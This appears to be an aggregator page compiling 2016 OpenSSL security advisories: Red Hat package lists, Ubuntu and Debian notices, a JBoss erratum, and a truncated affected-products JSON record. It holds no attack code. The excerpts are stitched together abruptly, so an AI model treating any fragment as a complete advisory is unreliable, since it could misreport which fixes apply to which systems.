1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase 1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation 1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio() 1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec() 1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection 1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) 1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer 1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks 1377594 - CVE-2016-6306 openssl: certificate message OOB reads 1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
ppc64: openssl-1.0.1e-48.el6_8.3.ppc.rpm openssl-1.0.1e-48.el6_8.3.ppc64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm openssl-devel-1.0.1e-48.el6_8.3.ppc.rpm openssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm
s390x: openssl-1.0.1e-48.el6_8.3.s390.rpm openssl-1.0.1e-48.el6_8.3.s390x.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm openssl-devel-1.0.1e-48.el6_8.3.s390.rpm openssl-devel-1.0.1e-48.el6_8.3.s390x.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm openssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm openssl-static-1.0.1e-48.el6_8.3.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm openssl-perl-1.0.1e-48.el6_8.3.s390x.rpm openssl-static-1.0.1e-48.el6_8.3.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
ppc64: openssl-1.0.1e-51.el7_2.7.ppc64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le: openssl-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x: openssl-1.0.1e-51.el7_2.7.s390x.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm openssl-devel-1.0.1e-51.el7_2.7.s390.rpm openssl-devel-1.0.1e-51.el7_2.7.s390x.rpm openssl-libs-1.0.1e-51.el7_2.7.s390.rpm openssl-libs-1.0.1e-51.el7_2.7.s390x.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm openssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm openssl-static-1.0.1e-51.el7_2.7.ppc.rpm openssl-static-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x: openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm openssl-perl-1.0.1e-51.el7_2.7.s390x.rpm openssl-static-1.0.1e-51.el7_2.7.s390.rpm openssl-static-1.0.1e-51.el7_2.7.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-2177 https://access.redhat.com/security/cve/CVE-2016-2178 https://access.redhat.com/security/cve/CVE-2016-2179 https://access.redhat.com/security/cve/CVE-2016-2180 https://access.redhat.com/security/cve/CVE-2016-2181 https://access.redhat.com/security/cve/CVE-2016-2182 https://access.redhat.com/security/cve/CVE-2016-6302 https://access.redhat.com/security/cve/CVE-2016-6304 https://access.redhat.com/security/cve/CVE-2016-6306 https://access.redhat.com/security/updates/classification/#important https://www.openssl.org/news/secadv/20160922.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI xpTW7ApBLmKhVjs49DGYouI= =4VgY -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
After installing the updated packages, the httpd daemon will be restarted automatically. Additional information can be found at https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/
CVE-2016-2178
Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing
leak in the DSA code.
CVE-2016-2179 / CVE-2016-2181
Quan Luo and the OCAP audit team discovered denial of service
vulnerabilities in DTLS.
For the stable distribution (jessie), these problems have been fixed in version 1.0.1t-1+deb8u4.
For the unstable distribution (sid), these problems will be fixed soon.
We recommend that you upgrade your openssl packages. ========================================================================== Ubuntu Security Notice USN-3087-1 September 22, 2016
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in OpenSSL. This issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178)
Quan Luo discovered that OpenSSL did not properly restrict the lifetime of queue entries in the DTLS implementation. (CVE-2016-2181)
Shi Lei discovered that OpenSSL incorrectly validated division results. (CVE-2016-2182)
Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES ciphers were vulnerable to birthday attacks. (CVE-2016-2183)
Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303)
Shi Lei discovered that OpenSSL incorrectly performed certain message length checks. (CVE-2016-6306)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: libssl1.0.0 1.0.2g-1ubuntu4.4
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.20
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.37
After a standard system update you need to reboot your computer to make all the necessary changes. Description:
This release adds the new Apache HTTP Server 2.4.29 packages that are part of the JBoss Core Services offering.
This release serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.23, and includes bug fixes and enhancements. Refer to the Release Notes for information on the most significant bug fixes, enhancements and component upgrades included in this release. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):
JBCS-373 - Errata for httpd 2.4.29 GA RHEL 7
7
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201609-0347", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "solaris", "scope": "eq", "trust": 2.1, "vendor": "oracle", "version": "10" }, { "model": "solaris", "scope": "eq", "trust": 2.1, "vendor": "oracle", "version": "11.3" }, { "model": "linux", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "6" }, { "model": "linux", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "7" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1t" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1n" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.1.0" }, { "model": "capssuite", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0 to v4.0" }, { "model": "enterpriseidentitymanager", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "esmpro/serveragentservice", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "(linux edition )" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "sg3600 all series" }, { "model": "ix1000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ix2000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ix3000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.2" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise v8.2 to v9.4" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "express v8.2 to v9.4" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "foundation v8.2 to v8.5" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard v8.2 to v9.4" }, { "model": "webotx enterprise service bus", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v8.5" }, { "model": "webotx portal", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v9.1" }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "webex centers t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13150-13" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series blade switches 4.1 e1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4000" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.9" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69010" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "ucs central software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13" }, { "model": "stealthwatch management console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for os deployment 5.1.fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.2" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.5" }, { "model": "jabber software development kit", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified workforce optimization", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "industrial router 1.2.1rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "910" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.14" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "nexus series switches standalone nx-os mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.3.1" }, { "model": "nexus series switches standalone nx-os mode 7.0 i5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.11" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.26" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.11" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60002.9" }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration provisioning", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "agent for openflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.4" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.8" }, { "model": "ons series multiservice provisioning platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154540" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "telepresence sx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa next-generation firewall services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0.1" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8200" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.9" }, { "model": "unified communications manager im \u0026 presence service (formerly c", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.3" }, { "model": "webex meetings for blackberry", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.5" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.0.1.3" }, { "model": "anyconnect secure mobility client for mac os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.0.7" }, { "model": "common services platform collector", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.11" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "partner support service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "media services interface", 